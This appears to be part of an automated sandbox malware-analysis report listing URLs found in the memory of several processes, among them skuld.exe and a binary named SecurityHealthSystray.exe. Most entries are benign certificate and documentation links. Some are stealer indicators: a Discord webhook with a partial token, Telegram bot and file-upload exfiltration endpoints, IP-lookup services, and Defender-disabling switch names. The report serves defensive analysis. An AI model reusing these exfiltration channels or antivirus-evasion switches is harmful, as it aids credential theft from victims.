                        Source: program.exe, 00000005.00000003.1522617049.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525014783.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518928868.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1523219477.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1522617049.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1522795628.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518152976.00000139887DF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519577277.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1521981805.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518342111.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525292752.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524879211.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524879211.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519976627.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519169307.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519414521.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519414521.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519755657.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518687948.00000139887E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                        Source: program.exe, 00000005.00000003.1522617049.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525014783.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518928868.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1523219477.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1522795628.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000002.1959967086.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518152976.00000139887DF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519577277.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1521981805.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518342111.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525292752.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524879211.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519976627.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519169307.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519414521.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519755657.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518687948.00000139887E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                        Source: program.exe, 00000005.00000003.1522617049.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525014783.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518928868.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1523219477.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1522795628.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518152976.00000139887DF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519577277.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1521981805.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518342111.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525292752.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524879211.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519976627.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519169307.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519414521.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519755657.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518687948.00000139887E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                        Source: program.exe, 00000005.00000003.1518687948.00000139887E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                        Source: program.exe, 00000005.00000003.1522617049.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525014783.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518928868.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1523219477.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1522795628.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000002.1959967086.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518152976.00000139887DF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519577277.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1521981805.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518342111.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525292752.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524879211.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519976627.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519169307.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519414521.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519755657.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518687948.00000139887E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                        Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                        Source: program.exe, 00000008.00000002.1938769127.00000237A46E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
                        Source: program.exe, 00000008.00000002.1939236456.00000237A4AE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                        Source: program.exe, 00000008.00000002.1939236456.00000237A4AE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
                        Source: program.exe, 00000008.00000002.1939236456.00000237A4AE0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1939236456.00000237A4D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
                        Source: skuld.exe, 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: http://ip-api.com/json
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                        Source: program.exe, 00000008.00000003.1548458152.00000237A47EC000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1543639297.00000237A47C5000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1549428382.00000237A4819000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingr~
                        Source: program.exe, 00000008.00000003.1548458152.00000237A47EC000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1543639297.00000237A47C5000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1549428382.00000237A4819000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingr~r
                        Source: powershell.exe, 00000014.00000002.1825728289.0000023993632000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1693664914.000001F88196B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1831279300.000001F8901BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1831279300.000001F89007B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                        Source: program.exe, 00000005.00000003.1522617049.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525014783.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518928868.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1523219477.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1522795628.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000002.1959967086.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518152976.00000139887DF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519577277.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1521981805.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518342111.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525292752.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524879211.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519976627.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519169307.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519414521.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519755657.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518687948.00000139887E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                        Source: program.exe, 00000005.00000003.1522617049.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525014783.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518928868.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1523219477.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1522617049.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1522795628.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518152976.00000139887DF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519577277.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1521981805.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518342111.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525292752.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524879211.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524879211.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519976627.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519169307.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519414521.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519414521.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519755657.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518687948.00000139887E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                        Source: program.exe, 00000005.00000003.1522617049.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525014783.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518928868.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1523219477.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1522617049.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1522795628.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518152976.00000139887DF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519577277.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1521981805.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518342111.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525292752.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524879211.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524879211.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519976627.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519169307.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519414521.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519414521.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519755657.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518687948.00000139887E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                        Source: program.exe, 00000005.00000003.1522617049.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525014783.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518928868.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1523219477.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1522795628.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518152976.00000139887DF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519577277.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1521981805.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518342111.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525292752.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524879211.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519976627.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519169307.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519414521.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519755657.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518687948.00000139887E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                        Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000002.1959967086.00000139887C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                        Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                        Source: powershell.exe, 00000033.00000002.1693664914.000001F881910000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524726807.00000139887ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
                        Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524726807.00000139887ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
                        Source: powershell.exe, 00000014.00000002.1689641102.00000239837E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: eternal.exe, 00000002.00000002.3208274696.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1689641102.00000239835C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1693664914.000001F880001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000014.00000002.1689641102.00000239837E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: program.exe, 00000008.00000002.1941153188.00000237A51F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
                        Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524726807.00000139887ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                        Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                        Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524726807.00000139887ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                        Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                        Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                        Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524726807.00000139887ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                        Source: powershell.exe, 00000033.00000002.1693664914.000001F881653000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: powershell.exe, 00000033.00000002.1693664914.000001F881910000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: program.exe, 00000005.00000003.1522617049.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525014783.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518928868.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1523219477.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1522795628.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000002.1959967086.00000139887ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518152976.00000139887DF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519577277.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1521981805.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518342111.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1525292752.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524879211.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519976627.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519169307.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519414521.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1519755657.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1518687948.00000139887E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                        Source: program.exe, 00000008.00000002.1939236456.00000237A4C7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
                        Source: program.exe, 00000008.00000002.1947748964.00000237A5906000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1747910715.00000237A5906000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1941288303.00000237A536C000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000003.1715550482.00000237A5906000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1663641819.00000237A5906000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1936233267.00000237A5906000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1638117750.00000237A5906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
                        Source: program.exe, 00000008.00000003.1743204693.00000237A58BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: program.exe, 00000008.00000003.1715550482.00000237A5914000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1638117750.00000237A5916000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1941288303.00000237A53F8000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000003.1936233267.00000237A5914000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1743204693.00000237A5914000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
                        Source: powershell.exe, 00000014.00000002.1689641102.00000239835C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1693664914.000001F880001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://allegro.pl/
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
                        Source: skuld.exe, 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: https://api.gofile.io/getServerhttps://%s.gofile.io/uploadFilesql:
                        Source: skuld.exe, 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: https://api.ipify.org/-DisableIOAVProtection-DisableScriptScanning%s
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/botP
                        Source: skuld.exe, 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: https://avatars.githubusercontent.com/u/145487845?v=4sqlite:
                        Source: program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
                        Source: program.exe, 00000008.00000003.1743204693.00000237A58BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: program.exe, 00000008.00000003.1743204693.00000237A58BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                        Source: program.exe, 00000008.00000003.1743204693.00000237A58BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: powershell.exe, 00000033.00000002.1831279300.000001F89007B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000033.00000002.1831279300.000001F89007B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000033.00000002.1831279300.000001F89007B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524726807.00000139887ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                        Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524726807.00000139887ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                        Source: program.exe, 00000005.00000003.1524454201.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000005.00000003.1524726807.00000139887ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
                        Source: SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: https://discord.com/api/v9/users/
                        Source: program.exe, 00000008.00000002.1941021680.00000237A50E0000.00000004.00001000.00020000.00000000.sdmp, SecurityHealthSystray.exe, 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: https://discord.com/api/webhooks/1298867906041479188/X0YmXSYYuFGsCIlZL1CQlv_GeIoIWc3S1cksX7_7_e4Onj-
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
                        Source: program.exe, 00000008.00000002.1938588123.00000237A44A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
                        Source: program.exe, 00000008.00000002.1939044962.00000237A48E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/howto/mro.html.
                        Source: program.exe, 00000008.00000002.1938239957.00000237A4200000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
